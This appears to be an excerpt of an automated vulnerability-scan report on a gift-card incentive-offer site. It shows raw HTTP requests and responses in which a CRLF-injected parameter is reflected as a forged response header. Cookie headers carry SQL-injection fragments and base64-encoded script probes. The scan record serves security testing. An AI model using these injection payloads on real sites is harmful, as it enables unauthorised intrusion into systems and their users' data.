x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=http://example.com/?
ns: netsparker056650=vuln&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=http://example.com/?
ns: netsparker056650=vuln&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=http://example.com/?
ns: netsparker056650=vuln&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET http://example.com/? ns: netsparker056650=vuln
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDI5KTwvc2NyaXB0Pg==; concat(CONCAT(CHAR(95)=; CHAR(33)=; CHAR(64)=; CHAR(52)=; CHAR(100)=; CHAR(105)=; CHAR(108)=; CHAR(101)=; CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1); JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:03:01 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db83025591371b7;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=http://example.com/?,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=http://example.com/?
ns: netsparker056650=vuln&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /info.htm

/info.htm

http://your-gift-zone.com/info.htm?tp=tos&promo_name=http://example.com/%3f%0D%0Ans:%20netsparker056..

Parameters

Parameter Type Value
tp GET tos
promo_name GET http://example.com/? ns: netsparker056650=vuln
catalog_id GET 13200
gift GET 29617
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /info.htm?tp=tos&promo_name=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1); JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==; 0)>0)=; 0)<255)=; 0)>25)=; 2))=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:12:02 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db83242ed8fb07v;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=http://example.com/?,gift_cookie=29617;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
ns: netsparker056650=vuln;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
Connection: close
Content-Type: text/html










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Your-gift-zone</title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/global-cust-service.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/giftstatus-content.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->




<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<div id="frame">
<div id="header">
<div id="navbar">
<div class="hovermenu">
<ul>
<li><a href="http://your-gift-zone.com/info.htm?tp=faq&user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">HELP</a></li>
<li><a href="http://your-gift-zone.com/redeem.htm?user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">GIFT STATUS</a></li>
<li><a href="http://your-gift-zone.com/testimonials.htm?user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200&wrap=0" target="_self">TESTIMONIALS</a></li>
<li><a href="http://your-gift-zone.com/info.htm?tp=con&user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">&nbsp;&nbsp;CONTACT US&nbsp;&nbsp;&nbsp;</a></li>
</ul>
</div>
</div>
<div id="mainhdr">Your-gift-zone</div>
<div id="pagehdr">Terms &amp; Conditions</div>
</div>

<div id="content" class="clearfix">
<div id="girlbody"><img src="http://i.pcp001.com/media/cs/girlbody.jpg" width="158" height="299"></div>
<div id="girlfingers"><img src="http://i.pcp001.com/media/cs/girl-fingers.jpg" width="343" height="54"></div>
<div id="mainarea">
<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name=http://example.com/?
ns: netsparker056650=vuln&gift=29617&catalog_id=13200" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
